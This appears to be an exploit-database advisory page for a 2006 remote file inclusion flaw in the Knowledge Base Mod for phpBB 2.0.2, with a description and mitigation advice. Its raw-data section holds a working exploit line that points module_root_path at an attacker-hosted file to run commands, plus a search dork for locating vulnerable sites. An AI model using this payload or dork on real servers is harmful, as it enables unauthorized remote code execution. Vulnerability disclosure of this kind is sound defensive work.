header-logo
Suggest Exploit
vendor:
Knowledge Base Mod
by:
[Oo]
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Knowledge Base Mod
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:knowledge_base_mod
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion

The Knowledge Base Mod for PHPbb <= 2.0.2 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a malicious URL in the module_root_path parameter of the /includes/kb_constants.php file. This malicious URL can be used to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. Additionally, the application should be kept up to date with the latest security patches.
Source

Exploit-DB raw data:

Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
Dork: "Powered by Knowledge Base"
Credits: [Oo]

Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]

Navigation

Suggest Exploit

Services By CQR